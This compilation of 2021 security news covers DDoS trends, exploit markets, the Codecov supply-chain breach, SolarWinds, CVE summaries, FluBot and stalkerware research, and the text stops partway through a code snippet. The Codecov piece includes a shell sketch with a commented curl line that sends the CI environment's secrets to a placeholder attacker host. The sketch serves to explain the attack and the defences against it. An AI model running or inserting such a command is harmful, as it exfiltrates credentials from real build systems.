DDoS Attacks Up 31% in Q1 2021: Report

If the pace continues, DDoS attack activity could surpass last year’s 10-million-attack threshold.

Researchers recorded approximately 2.9 million DDoS attacks in the first quarter of 2021, marking a 31% increase from the same period in 2020.

Netscout’s Atlas Security Engineering & Response Team (ASERT) anticipated last year that the high DDoS numbers recorded in 2020 would extend into 2021. Now researchers report all three months of the first quarter surpassed the 900,000-attack mark. If this activity holds, they say, DDoS attack activity is set to exceed the 10-million attack threshold recorded last year.

This activity is unusual, the researchers say, as January and February are typically the slowest months for DDoS attacks. In 2021 they observed 972,000 attacks in January alone, beating last May’s record for the highest number of attacks seen in one month.

They note the size of DDoS attacks has “remained relatively flat,” with no large terabit attacks spotted. However, attackers continue to seek new ways to make their attacks faster and harder to mitigate. Most (42%) DDoS attacks last five to 10 minutes; those spanning less than five minutes dropped from 24% to 19% of all DDoS attacks. The share of longer-duration attacks stayed the same.

Healthcare organizations were hit with about 7,000 DDoS attacks in the third quarter of 2020, 10,000 in the fourth quarter, and 8,400 in the first quarter of this year, marking a 53% increase from the first quarter of 2020. Researchers also report a 41% increase in attacks targeting educational services over the past three quarters, with 45,000 in the first quarter of 2021 alone.

Read Netscout’s blog post for more details.



47% of Criminals Buying Exploits Target Microsoft Products

Researchers examine English- and Russian-language underground exploits to track how exploits are advertised and sold.

RSA Conference 2021 – Microsoft products accounted for 47% of the CVEs that cybercriminals request across underground forums, according to researchers who conducted a yearlong study into the exploit market.

The research spanned more than 600 English- and Russian-language forums, said Mayra Rosario Fuentes, senior threat researcher at Trend Micro, who presented some of the findings in her RSA Conference talk “Tales from the Underground: The Vulnerability Weaponization Lifecycle.” Researchers sought to learn which exploits were sold and requested, the types of sellers and buyers involved in transactions, and how their findings compared with data from their own detection systems.

Researchers scoured advertisements for the sales of exploits from January 2019 through December 2020. They learned Microsoft’s tools and services made up 47% of all requested CVEs on underground forums. Internet-connected products made up only 5%, “but with increased bandwidth of connected devices with the new 5G entering the market, IoT devices will become more vulnerable to cyberattack,” noted Fuentes in her talk.

More than half (52%) of exploits requested were less than two years old. Buyers were willing to pay an average of $2,000 (USD) for requested exploits; however, some offered up to $10,000 for zero-day exploits targeting Microsoft products.

Fuentes shared some examples of these exploit requests. One forum post requested help regarding an exploit for CVE-2019-1151, a Microsoft Graphics remote code execution (RCE) vulnerability that exists when the Windows font library improperly handles specially crafted embedded fonts. Another offered $2,000 for help in exploiting an RCE flaw in the Apache Web server.

When researching forum posts advertising exploits, researchers found 61% targeted Microsoft products. The highest percentage (31%) were for Microsoft Office, 15% were for Microsoft Windows, 10% were for Internet Explorer, and 5% were for Microsoft Remote Desktop Protocol. Fuentes noted exploits for Office and Adobe were most common in English-language forums.

A comparison of cybercriminals’ wish lists and sold exploits revealed parallels between the two categories, Fuentes pointed out.

“We noticed what was requested was very similar to what the market was offering,” she said. “Cybercriminals may have seen the requested items from users before deciding what items to offer on the market.”

Microsoft Word and Excel exploits “dominated” in both categories, Fuentes continued, digging into the broader Office category. Word and Excel made up 46% of exploits on criminals’ wish lists and 52% of exploits advertised on underground forums.

The Life Cycle of Underground Exploits
Fuentes discussed how exploits are developed and sold, starting from the beginning. An exploit is typically first developed by an attacker, who sells it; it is then used in the wild. From there, it is usually disclosed publicly and patched by the vendor. This may end the exploit’s life cycle, or the exploit may continue to be offered for sale on Dark Web forums.

There are multiple types of sellers, she noted. An experienced seller with at least five years of experience might sell a couple of zero-day or one-day exploits per year with prices ranging from $10,000 to $500,000. Some sellers are disgruntled with bug bounty programs due to long response times or payouts lower than expected – Fuentes noted most people were happy with bug bounty experiences, but those who weren’t may sell exploits on underground forums.

Other “bounty sellers” may have cashed in on the maximum amount of bounty submissions for the year, or they may offer to buy exploits they can use to cash in on bug bounty programs. There are some who find exploits that other people developed and sell them as their own.

Some sellers advertise “exploit builder” subscription services ranging from $60 for one month, to $120 for three months, to $200 for six months. The packages include a range of different types of exploits, along with “free updates” and “full support” for criminal buyers, she noted.

While zero-days may fetch a higher price, many exploits sold on the underground targeted older systems. Researchers found 22% of exploits sold were more than three years old, and 48% of those requested were older than three years. The oldest vulnerability discovered was from 1999, Fuentes said, adding the average time to patch an Internet-facing system is 71 days.

Older vulnerabilities requested included CVE-2014-0133 in Red Hat and CVE-2015-6639 in Qualcomm. Those sold included Microsoft CVE-2017-11882, a 17-year-old memory corruption issue in Microsoft Office, along with Office vulnerability CVE-2012-0158 and CVE-2016-5195, a Linux kernel vulnerability dubbed Dirty Cow that sold for $3,000 on the underground, she said.

“The longevity of a valuable exploit is longer than most expect,” Fuentes said. “Patching yesterday’s vulnerability can be just as important as today’s critical one.”

Trend Micro will release a report with the full findings in a few weeks, she noted.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial …


Rapid7 Is the Latest Victim of a Software Supply Chain Breach

Security vendor says attackers accessed some of its source code using a previously compromised Bash Uploader script from Codecov.

An unknown number of Rapid7 customers — and Rapid7 itself — have become the latest victims of security incidents affecting trusted third-party software supply chain partners.

On Friday, Rapid7 disclosed that attackers had accessed some of its source code repositories via a third-party Bash Uploader from Codecov that the security vendor was using in its development environment.

The attackers had previously compromised the uploader and modified it so code and associated data from Rapid7 and other Codecov customer environments would be uploaded to an attacker-controlled server — in addition to Codecov’s own systems as intended.

Many companies use Codecov’s software to verify how effectively they are testing software in development for security and other issues. Codecov’s Bash Uploader script is used to upload certain data — containing credentials, tokens, or keys — from customer CI environments to its own servers.

In January 2021, an attacker gained access to the Bash Uploader by taking advantage of an error in Codecov’s Docker image creation process. According to Codecov, the configuration error allowed the attacker to extract a credential for modifying the Bash Uploader script. Codecov did not discover the modification until four months later, in April 2021.

During that period, the attacker used the modified Bash Uploader to access and export data from Codecov customer continuous integration (CI) environments to a remote server. Codecov described the compromised Bash Uploader as giving attackers the ability to potentially extract a range of information from CI environments, including credentials as well as any services, data stores, and application code associated with these credentials.
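Public write-ups of the incident describe the malicious change as essentially one injected line in the uploader script. The following is a generic sketch of that pattern, not Codecov’s actual script: the attacker URL is a placeholder, and the exfiltration is simulated with a local file write rather than a real network request.

```shell
#!/usr/bin/env sh
# Sketch: how one injected line in a trusted CI upload script leaks secrets.
# Hypothetical example only -- placeholder URL, no real network call.

ATTACKER_URL="https://attacker.example.invalid/upload"  # placeholder

# ... the script's legitimate work (collecting and uploading coverage) ...
echo "Uploading coverage report..."

# Injected line: CI jobs commonly keep tokens, keys, and cloud credentials
# in environment variables, so dumping the environment captures them all.
# A real variant might look like:
#   curl -sm 0.5 -d "$(env)" "$ATTACKER_URL" || true
env > /tmp/leaked_env.txt  # simulated exfiltration (local file only)
```

Defensively, this illustrates why verifying a checksum for any script fetched at build time, and failing the build on a mismatch, matters: a tampered uploader would no longer match the published hash.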

Rapid7 said that when it learned of the incident at Codecov, it initiated an internal response process to understand how the company might have been affected. The investigation showed that attackers had used the compromised Bash Uploader to access “a small subset” of source code related to tooling for the company’s managed detection and response (MDR) service.

“Those repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers,” Rapid7 said Friday.

Rapid7 described the use of Codecov’s Bash Uploader as being limited to a single CI server set up for its MDR service. As a result, no production environments or other corporate systems were accessed or modified, the security vendor said. The small — but undisclosed — number of Rapid7 customers that may have been affected in the attack have all been notified and advised of mitigation measures, Rapid7 said.

Growing List
Rapid7 and its customers are the latest in a growing list of victims of software supply chain incidents in recent months. The most notable example remains the one that SolarWinds disclosed last December, which affected some 18,000 organizations worldwide. In that incident, a nation-state actor gained access to SolarWinds’ development environment and planted a backdoor in software that was later sent out as automatic updates of the company’s Orion network management technology. In another incident, an attacker compromised a near-obsolete file transfer technology from Accellion and used it to exfiltrate data from several large organizations.

Concerns over such incidents appear to have prompted President Biden to make software supply chain security a major focus of a new executive order on cybersecurity that he issued last week.

“Rapid7 is the latest in a string of companies to be severely impacted by security supply chain-related attacks,” says Kevin Dunne, president of Pathlock. “Security vendors are often high-value targets, as they have deep, trusted access to networks that can provide an effective Trojan horse for bad actors.”

Though the impact to Rapid7 customers seems minimal, they need to remain on high alert, Dunne says. He advocates they work closely with Rapid7’s incident response and support teams to make any necessary updates. “In the meantime,” he adds, “they should monitor activity on their network, applications, and devices to highlight any suspicious behavior coming from Rapid7’s software and mitigate any potential threats.”

Setu Kulkarni, vice president of strategy at WhiteHat Security, says that, based on current information, the impact on Rapid7’s customers appears minimal. Even so, he finds it curious that the company would keep MDR-related data in a code repo on a non-production server in the first place. “If it were, did it pass the security controls for data at rest?” Kulkarni asks. “Broadly, [the incident] does highlight why customer-related data should not be stored in code repos and, if anything, dummy anonymized data should be used for testing.”

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year …


RSAC 2021: What Will SolarWinds' CEO Reveal?

In a keynote conversation with Forrester analyst Laura Koetzle, Sudhakar Ramakrishna will get candid about the historic breach.

(Image: MiaStendal via Adobe Stock)

Since the news broke in December, the name SolarWinds has become both a buzzword and a cautionary tale that everyone in the security industry continues to talk about. It is to 2021 what Equifax was to 2017. So it’s no surprise that a keynote discussion placing SolarWinds CEO Sudhakar Ramakrishna in the hot seat is one of the most highly anticipated items on this week’s RSA Conference 2021 agenda.

In what is promised to be a candid discussion between Forrester analyst Laura Koetzle and Ramakrishna, the session, titled “SolarWinds: What Really Happened?,” will offer a view of the attack’s details: the what, how, and who of what went down – and what industry professionals might learn from the breach.

Dark Reading spoke to Koetzle in advance about what she’s anticipating to come out of the session and her view of the headline-making attack.

Dark Reading: Sudhakar Ramakrishna will be speaking with you about the results of a long investigation, his perspective around the attack, and specific learnings from the incident. For starters, what are you hoping attendees will gain from the session?
Koetzle: When RSA Conference asked me to interview Sudhakar for the keynote session, I agreed quite quickly. And then the next day I realized that much would depend on how candid Sudhakar was willing to be – and how open his legal and communications team were willing to let him be. Happily, Sudhakar and his team wanted to be as transparent as possible about the incident and everything that followed from it, which I’m hoping the members of the security community will both appreciate and emulate.

Our discussion should let attendees see the choices and pressures that SolarWinds faced from the inside so that they’re better prepared when they’re faced with a breach themselves. I’m also hoping that attendees will learn from the things that SolarWinds did well and from the things that they would do differently in hindsight.

Dark Reading: As an experienced security analyst who has been following high-profile incidents like SolarWinds for many years, how do you think the organization handled the fallout in the immediate days following the news? One of the headlines was about how a password issue was the result of an intern’s mistake. Some criticized that as a misstep. What is your take?
Koetzle: The “intern posts password in cleartext on GitHub” incident is tailor-made for finger-wagging headlines, and it also became a hot-button issue when Sudhakar and former SolarWinds CEO Kevin Thompson testified at a congressional hearing. Sudhakar and I will discuss this in our interview, because, one, the credentials the intern posted weren’t used in the breach, and some of the reporting at the time seemed to indicate that they had been, and, two, Sudhakar acknowledges that he and his colleagues didn’t handle that situation optimally.

Dark Reading: And with a new CEO at the helm, how do you think they continue to handle things now? Are there any takeaways from what you are observing that are helpful for other companies that may deal with a breach in the future?
Koetzle: As attendees will hear during the interview, Sudhakar was announced as the incoming CEO of SolarWinds on Dec. 9, 2020. That’s the day after FireEye announced it had been the victim of an attack but before anyone at SolarWinds knew about the compromise to SolarWinds Orion. Sudhakar didn’t take over as CEO until Jan. 4, 2021, when SolarWinds was about three weeks into its response to the breach. So Sudhakar walked into a high-profile incident response.

I was surprised and pleased by how candid Sudhakar and SolarWinds were willing to be for our interview, and the same goes for their response itself. They’ve released new information as they learned it throughout their response to help their customers and the security community, rather than repeating “No comment” until they felt like they had everything buttoned up. That transparency is something I’d encourage attendees and other companies responding to breaches to emulate.

Dark Reading: We are heading into this talk with the Colonial Pipeline attack now fresh in our minds. The last six months have brought us several attacks that have major implications on US national security and infrastructure. In Washington, lawmakers are discussing legislative fixes, and the Biden administration is talking about a new information-sharing system among private companies and the US government. What are your thoughts on some of what is being proposed?
Koetzle: Suffice it to say that more cybersecurity legislation and regulation is long overdue, so I welcome the attention to it. The Biden administration had been signaling its intent to prioritize spending to address cybersecurity risk in its first several weeks in office. I’m happy that they’re emphasizing the “unsexy but necessary” bits of information security practice, such as making sure that government agencies actually implement the best practices for identifying and managing risks that its own experts recommend; according to the GAO, none of the 23 agencies they’d reviewed had implemented those practices as of March 2021.

And as one of the members of the Forrester security research team who was present at the creation of the zero-trust approach back in 2009, I’m thrilled to see the US federal government is mandating the use of zero trust – because it works. I’m also happy to see that President Biden’s executive order requires that products provide a software bill of materials (SBOM), following the approach that the National Telecommunications and Information Administration (NTIA) at the US Department of Commerce has been coordinating with the software industry. Widespread implementation of SBOM will mean that companies and security professionals can know what’s really in the software products they buy and use.
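For readers unfamiliar with the format, an SBOM is simply a machine-readable inventory of the components inside a piece of software. As a rough illustration, here is a minimal sketch in the style of the CycloneDX format, one of the formats the NTIA effort covers; the component listed is purely illustrative:

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.2",
  "version": 1,
  "components": [
    {
      "type": "library",
      "name": "log4j-core",
      "version": "2.14.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
    }
  ]
}
```

With an inventory like this for every product, a security team can answer “do we ship component X?” by querying SBOMs rather than auditing builds by hand.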

Dark Reading: Now that we are six months out from when the news of SolarWinds first broke, what is your take on the lessons security and software vendors can learn from this breach?
Koetzle: I’ve already mentioned that I was impressed by SolarWinds’ commitment to transparency and its willingness to share what it has learned in its investigation; that’s a practice I’d suggest we all emulate. But for security and software vendors specifically, if you’ve succumbed to the temptation of producing opportunistic marketing – I’ve seen some egregious “Want to avoid a breach like SolarWinds had? Buy our software!” pitches, which I immediately toss in the virtual trash bin – please stop now. Most security professionals know that we’re all going to be the victims of an incident sometime. Today it’s SolarWinds, but tomorrow it could be you.

Dark Reading: Moving forward, what do you suggest CISOs and security managers focus on to establish or improve product security initiatives?
Koetzle: Many CISOs and other security professionals are accustomed to working in internal, enterprise security environments, and working on the security of the products that your company sells requires a different mindset. Strong product security requires working with product teams in the very early stages of development, which is more chaos than many security professionals are accustomed to.

If you’re working on product security, you’ll need to be comfortable with lots of uncertainty and to create risk management processes that accept high levels of risk at the early stages and encourage developers to reduce risk – and improve security – as they improve the product they’re building. “Minimum viable security” isn’t a phrase traditional security professionals use very often, but that’s the right way to think about the acceptable security level for a minimum viable product.

More details on the keynote discussion between Koetzle and Ramakrishna can be found here.

Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online.



Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database

PUBLISHED: 2021-05-17

An authentication brute-force protection mechanism bypass in telnetd in D-Link Router model DIR-842 firmware version 3.0.2 allows a remote attacker to circumvent the anti-brute-force cool-down delay period via a timing-based side-channel attack.

PUBLISHED: 2021-05-17

Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware, where IOCTLs 0x80002014 and 0x80002018 expose unrestricted disk read and write capabilities, respectively. A non-privileged process can open a handle to .ZemanaAntiMalware, register with the driver using IOCTL 0x8000201…

PUBLISHED: 2021-05-17

Incorrect access control in zam64.sys, zam32.sys in MalwareFox AntiMalware allows a non-privileged process to open a handle to .ZemanaAntiMalware, register itself with the driver by sending IOCTL 0x80002010, allocate executable memory using a flaw in IOCTL 0x80002040, install a hook wit…

PUBLISHED: 2021-05-17

Intelbras Router RF 301K Firmware 1.1.2 is vulnerable to Cross Site Request Forgery (CSRF) due to lack of validation and insecure configurations in inputs and modules.

PUBLISHED: 2021-05-17

Intelbras Router RF 301K Firmware 1.1.2 is vulnerable to Cross Site Request Forgery (CSRF) due to lack of security mechanisms for token protection and unsafe inputs and modules.

Agility Broke AppSec. Now It's Going to Fix It.

Outnumbered 100 to 1 by developers, AppSec needs a new model of agility to catch up and protect everything that needs to be secured.

In today’s high-tech industries, security is struggling to keep up with rapidly changing production systems and the chaos that agile development introduces into workflows. Application security (AppSec) teams are fighting an uphill battle to gain visibility and control over their environments. Rather than investing their time in critical activities, teams are overwhelmed by gaps in visibility and by a lack of tools to govern the process. As a result, many digital services remain improperly protected. To catch up, AppSec must adopt a model of agility that is compatible with software development.

The Case for Agility
The agile process continuously integrates small changes and collects meaningful feedback along the way, allowing an ever-progressing evolution of software. With small steps, you pay less for mistakes and learn as you go. This approach, powered by continuous integration/continuous delivery (CI/CD), source code management (SCM), and an amazing array of collaboration tools, makes the software industry fast and powerful.

AppSec teams are charged with making sure software is safe. Yet, as the industry’s productivity multiplied, AppSec experienced shortages in resources to cover basics like penetration testing and threat modeling. The AppSec community developed useful methodologies and tools — but outnumbered 100 to 1 by developers, AppSec simply cannot cover it all.

Software security (like all software engineering) is a highly complex process built upon layers of time-consuming, detail-oriented tasks. To move forward, AppSec must develop its own approach to organize, prioritize, measure, and scale its activity.

What Would Agile AppSec Look Like?
Agile approaches and tools emerged from recognizing the limitations of longstanding approaches to software development. However, AppSec’s differences mean it can’t simply copy software development. For example, bringing automated testing into CI/CD might overlook significant things. First, every asset delivered outside CI/CD will remain untested and require alternative AppSec processes, potentially leading to unmanaged risk and shadow assets. Second, when developers question the quality of a report, it creates friction between engineers and security, jeopardizing healthy cooperation. This applies to every aspect of AppSec, not just testing.

We need to dig deeper, examine the tenets of agility, and define an approach that overcomes limitations and helps master the chaos.

1. Stakeholders, Deliverables, and Sustainability
AppSec teams’ attention is required at all layers of engineering, which often creates bottlenecks, even for teams with a clear focus. This motivates organizations to delegate security tasks to developers. Since AppSec is a resource-consuming discipline, delegating tasks is key to success. However, many organizations struggle with the complexity of ownership in AppSec. For example, automated security tools are merely guests in CI/CD and have varying levels of acceptance among developers, so things may fall between the cracks.

Furthermore, AppSec’s role includes directing the organization strategically. As maturity-focused initiatives like BSIMM and SAMM argue, collecting the right data and publishing it to the right stakeholders promotes security simultaneously from the bottom up and the top down.

To become agile, AppSec must own measurement and governance while delivering services in a way that encourages developers to pull security to the left. AppSec agility requires breaking dependencies in anything related to posture measurement and governance and establishing sustainable, independent operations that set their own strategy and tactics.

2. Discovering Requirements
The potential disruption caused by releasing new software in enterprises encourages product teams to avoid assumptions and learn what works for users; there’s a constant journey to discover requirements. While security requirements are clear on paper, with software proliferating so quickly, governance of the process becomes aspirational for most teams.

With regulatory and industry standards continuously evolving, AppSec must develop an agile ability to rapidly define the organization’s security priorities.

3. People, Processes, and Tools
Agile development requires the cooperation of motivated and empowered individuals. The tools that helped development outpace AppSec, such as Git for working simultaneously on code, Jira for tracking complex plans, and Jenkins for optimizing and standardizing build, test, and deploy pipelines, are instrumental to agility. They allow users to spend less effort on peripheral tasks and move faster while benefiting from the insightful data these tools hold.

While there is no replacement for having a professional security architect, a razor-sharp pen tester, and a properly armed bug hunter, there is great promise in automated security testing and runtime protection. Instrumental to AppSec agility are systems that reduce menial tasks and utilize data from one activity to make another more effective.

Better, scalable AppSec requires better intel collection, measurement metrics, and orchestration. Teams must be able to allocate their talent well, using prescriptive metrics to guide prioritization. AppSec teams should be able to immediately know what assets they are protecting and which are most important. By making more security services accessible to the organization and providing leadership with actionable measurements, teams will be able to embrace systematic processes such as validated learning and lead their organization to maturity.

From Agile to Mature
The time has come for AppSec to operate at the level of the field it protects. This is the only way for AppSec teams to do their job effectively while providing the speedy production that keeps boards happy. AppSec teams deserve clearer workflows, more automation, and true visibility. Software engineers have learned to master machines and make them their friends. It is high time that application security did the same. Frankly, it can no longer afford not to.

Chen Gour-Arie is the Chief Architect and Co-Founder of Enso Security. With over 15 years of hands-on experience in cybersecurity and software development, Chen demonstrably bolstered the software security of dozens of global enterprise organizations across multiple industry …



Enterprise Vulnerabilities
From DHS/US-CERT’s National Vulnerability Database

PUBLISHED: 2021-05-17

The Portal Store module in Liferay Portal 7.0.0 through 7.3.5, and Liferay DXP 7.0 before fix pack 97, 7.1 before fix pack 21, 7.2 before fix pack 10 and 7.3 before fix pack 1 does not obfuscate the S3 store’s proxy password, which allows attackers to steal the proxy password via man-in-the-middle a…

PUBLISHED: 2021-05-17

Cross-site scripting (XSS) vulnerability in the Site module’s membership request administration pages in Liferay Portal 7.0.0 through 7.3.5, and Liferay DXP 7.0 before fix pack 97, 7.1 before fix pack 21, 7.2 before fix pack 10 and 7.3 before fix pack 1 allows remote attackers to inject arbitrary we…

PUBLISHED: 2021-05-17

Cross-site scripting (XSS) vulnerability in the Redirect module’s redirection administration page in Liferay Portal 7.3.2 through 7.3.5, and Liferay DXP 7.3 before fix pack 1 allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_redirect_web_internal_portlet_RedirectPor…

PUBLISHED: 2021-05-17

Cross-site scripting (XSS) vulnerability in the Asset module’s category selector input field in Liferay Portal 7.3.5 and Liferay DXP 7.3 before fix pack 1, allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortl…

PUBLISHED: 2021-05-17

Multiple SQL injection vulnerabilities in Liferay Portal 7.3.5 and Liferay DXP 7.3 before fix pack 1 allow remote authenticated users to execute arbitrary SQL commands via the classPKField parameter to (1) CommerceChannelRelFinder.countByC_C, or (2) CommerceChannelRelFinder.findByC_C.

Take action now – FluBot malware may be on its way

Why FluBot is a major threat for Android users, how to avoid falling victim, and how to get rid of the malware if your device has already been compromised

Android malware known as FluBot is continuing to cause mayhem across some European countries, and there is speculation that the bad actors behind it may decide to target other geographies, including the United States. Here’s why you should be vigilant, how FluBot operates, and how you can remove this Android nasty from your device.

It’s also worth noting that this advice will help you stay safe from other Android malware strains. In recent days, cybercriminals have begun to target Europeans with TeaBot (also known as Anatsa or Toddler), an Android malware family that uses exactly the same technique as FluBot to spread and to lure users into giving up their sensitive data. FluBot and TeaBot are detected by ESET products as variants of the Android/TrojanDropper.Agent family.

How FluBot operates

If a victim is lured into the malicious campaign, their entire Android device becomes accessible to the scammer, including the ability to steal credit card numbers and access credentials for online banking accounts. To avoid removal, the malware implements mechanisms that stop the built-in protection offered by the Android OS and block the installation of many third-party security software packages, a step many users would otherwise take to remove malicious software.

The victim first receives an SMS message that impersonates a popular delivery logistics brand, such as FedEx, DHL, and Correos (in Spain). The call to action of the message is for the user to click a link in order to download and install an app that has the same familiar branding as the SMS message but is actually malicious and has the FluBot malware embedded within it. An example of the SMS message (in German) and the subsequent prompt to install the app can be seen below:

Once installed and granted the requested permissions, FluBot unleashes a plethora of functionality, including SMS spamming, the theft of credit card numbers and banking credentials, and spyware. The contact list is exfiltrated from the device and sent to servers under the control of the bad actor, providing them with additional personal information and enabling them to unleash further attacks on other potential victims. SMS messages and notifications from telecom carriers can be intercepted, browser pages can be opened, and overlays to capture credentials can be displayed.

The malicious app also disables Google Play Protect to avoid detection by the operating system’s built-in security. Also, due to the excessive permissions granted, the bad actor is able to block the installation of many third-party anti-malware solutions.
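The initial lure described above can be reduced to a simple heuristic: a message that name-drops a delivery brand but links somewhere other than that brand's own domain is a red flag. The sketch below is illustrative only, not ESET's detection logic; the brand and domain lists are placeholder examples.

```python
import re

# Example brand lures and their legitimate domains (placeholders, not exhaustive).
DELIVERY_BRANDS = {"fedex", "dhl", "correos"}
OFFICIAL_DOMAINS = {"fedex.com", "dhl.com", "correos.es"}
URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)

def looks_like_delivery_smishing(text: str) -> bool:
    """Flag SMS texts that mention a delivery brand but link off-brand."""
    lowered = text.lower()
    if not any(brand in lowered for brand in DELIVERY_BRANDS):
        return False
    for match in URL_RE.finditer(text):
        host = match.group(1).lower()
        # A delivery lure pointing anywhere but the brand's own domain is suspect.
        if not any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS):
            return True
    return False
```

A real filter would also handle URL shorteners and homoglyph domains; this only captures the basic mismatch FluBot campaigns exploit.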

How to remove FluBot

A compromised device may need to have the malware removed manually. My colleague, Lukas Stefanko, has produced a short video with helpful instructions on how to remove this and any other malicious app:

If you receive an unknown or unexpected SMS message with a clickable link, refrain from clicking the link and instead delete the message. In the unfortunate scenario that the malware was installed on a device and banking or other activity has taken place since the installation, contact the organizations concerned immediately, block access, and where necessary change passwords, remembering to make them unique and strong.
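The "unique and strong" password advice can be sketched with Python's standard library; `secrets` is designed for security-sensitive randomness, unlike the general-purpose `random` module. This is a minimal illustration; in practice a password manager does this for you.

```python
import secrets
import string

# Draw each character from the full printable set using a CSPRNG.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

def make_password(length: int = 16) -> str:
    """Generate a random password of the given length."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))
```

Generate a fresh password per account so a leak at one service cannot be replayed elsewhere.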

Whether or not this malware reaches North America in significant numbers, the functionality and the devastation it has already caused in Europe should heighten the call to action for all Android users: watch out for suspicious messages, and install security software to prevent such malicious apps from ever getting onto their devices.

Android stalkerware threatens victims further and exposes snoopers themselves

ESET research reveals that common Android stalkerware apps are riddled with vulnerabilities that further jeopardize victims and expose the privacy and security of the snoopers themselves

Mobile stalkerware, also known as spouseware, is monitoring software silently installed by a stalker onto a victim’s device without the victim’s knowledge. Generally, the stalker needs to have physical access to a victim’s device so as to side-load the stalkerware. Because of this, stalkers are usually someone from the close family, social or work circles of their victims.

Based on our telemetry, stalkerware apps have become more and more popular in the last couple of years. In 2019 we saw almost five times more Android stalkerware detections than in 2018, and in 2020 there were 48% more than in 2019. Stalkerware can track the GPS location of a victim’s device, conversations, images, browser history and more. It also stores and transmits all this data, which is why we decided to forensically analyze how these apps handle the protection of the data.

Figure 1. Based on our detection telemetry, usage of Android stalkerware is increasing
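Putting the two year-over-year figures together, the growth compounds; a rough back-of-the-envelope calculation, taking the "almost five times" figure literally:

```python
# Multipliers taken straight from the percentages quoted above.
growth_2019_vs_2018 = 5.0   # "almost five times more" detections than 2018
growth_2020_vs_2019 = 1.48  # 48% more than 2019

# Year-over-year multipliers compound into the overall change.
growth_2020_vs_2018 = growth_2019_vs_2018 * growth_2020_vs_2019
print(f"2020 vs. 2018: ~{growth_2020_vs_2018:.1f}x")  # prints "2020 vs. 2018: ~7.4x"
```

In other words, the telemetry implies roughly a sevenfold rise in Android stalkerware detections over two years.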

To stay under the radar and avoid being flagged as stalkerware, vendors in many cases promote their apps as protecting children, employees, or women, even though the word “spy” appears many times on their websites. Searching for these tools online isn’t difficult at all; there is no need to browse underground websites. The screenshot below depicts perhaps the most unsavory example: an app that claims to monitor women for their safety.

Figure 2. A stalkerware app’s claim to monitor women allegedly for their safety

The security and privacy issue categories uncovered in the analysis (broken down in Figure 3 below) are:

- Insecure transmission of user PII (CWE-200)
- Storing sensitive information on external media (CWE-922)
- Exposure of sensitive user information to unauthorized user (CWE-200)
- Server leak of stalkerware client information (CWE-200)
- Unauthorized data transmission from device to server
- Incorrect permission assignment for devices with superuser privileges (CWE-732)
- Insufficient verification of client uploaded data (CWE-345)
- Improper authorization of SMS commands (CWE-285)
- Bypass payment to access admin console (CWE-284)
- Command injection (CWE-926)
- Enforcing weak registration password (CWE-521)
- Missing proper password encryption (CWE-326)
- Victim data kept on server after account removal
- Leak of sensitive information during IPC communication (CWE-927)
- Partial access to admin console (CWE-285)
- Remote livestream of video and audio from victim device (CWE-284)
- Running as system application
- Source code and super admin credentials leak (CWE-200)

More than 150 security issues in 58 Android stalkerware apps

If nothing else, stalkerware apps encourage clearly ethically questionable behavior, leading most mobile security solutions to flag them as undesirable or harmful. However, given that these apps access, gather, store, and transmit more information than any other app their victims have installed, we were interested in how well these apps protected that amount of especially sensitive data.

Hence, we manually analyzed 86 stalkerware apps for the Android platform, provided by 86 different vendors. In this analysis we define a person who installs and remotely monitors or controls stalkerware as a stalker. A victim is a targeted person that a stalker spies on via the stalkerware. Finally, an attacker is a third party whom the stalker and the victim are not usually aware of. An attacker can carry out actions such as exploiting security issues or privacy flaws in stalkerware or in its associated monitoring services.

This analysis identified many serious security and privacy issues that could result in an attacker taking control of a victim’s device, taking over a stalker’s account, intercepting the victim’s data, framing the victim by uploading fabricated evidence, or achieving remote code execution on the victim’s smartphone. Across 58 of these Android applications we discovered a total of 158 security and privacy issues that can have a serious impact on a victim; indeed, even the stalker or the app’s vendor may be at some risk.

Following our 90-day coordinated disclosure policy, we repeatedly reported these issues to the affected vendors. Unfortunately, to this day, only six vendors have fixed the issues we reported in their apps. Forty-four vendors haven’t replied and seven promised to fix their problems in an upcoming update, but still have not released patched updates as of this writing. One vendor decided not to fix the reported issues.

Discovered security and privacy issues

The 158 security and privacy issues found across the 58 stalkerware apps are ordered by how frequently each occurred in the analyzed samples.

Figure 3. Breakdown of security and privacy issues uncovered in this research


The research should serve as a warning to potential future clients of stalkerware to reconsider using such software against their spouses and loved ones: not only is it unethical, but it may also expose their partners’ private and intimate information and leave them at risk of cyberattacks and fraud. And since there is often a close relationship between stalker and victim, the stalker’s private information could be exposed as well. During our research, we found that some stalkerware keeps information about the stalkers using the app, along with their victims’ data, on a server even after the stalkers requested the data’s deletion.

This is just a snapshot of what we found during our research and so we invite you to read the whole paper.

Rapid7 Source Code Accessed in Supply Chain Attack

An investigation of the Codecov attack revealed intruders accessed Rapid7 source code repositories containing internal credentials and alert-related data.

Security firm Rapid7 has confirmed attackers have accessed a subset of its source code, which contained internal credentials and alert-related data, following an investigation launched after the Codecov supply chain attack.

Codecov, which provides tools to verify how well software tests cover code in development, announced the attack on April 15. Attackers had modified its Bash Uploader Script to export sensitive data, including credentials, software tokens, and keys, Codecov said. It advised clients to create a list of credentials that its software could access and consider them compromised.
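One general defense against tampered CI helper scripts of this kind is to pin a known-good checksum and verify any fetched script against it before execution. The sketch below is illustrative, not Codecov's official tooling; the pinned digest would come from the vendor's published value.

```python
import hashlib
from pathlib import Path

def sha256_matches(path: str, expected_hex: str) -> bool:
    """Return True only if the file's SHA-256 digest equals the pinned value."""
    actual = hashlib.sha256(Path(path).read_bytes()).hexdigest()
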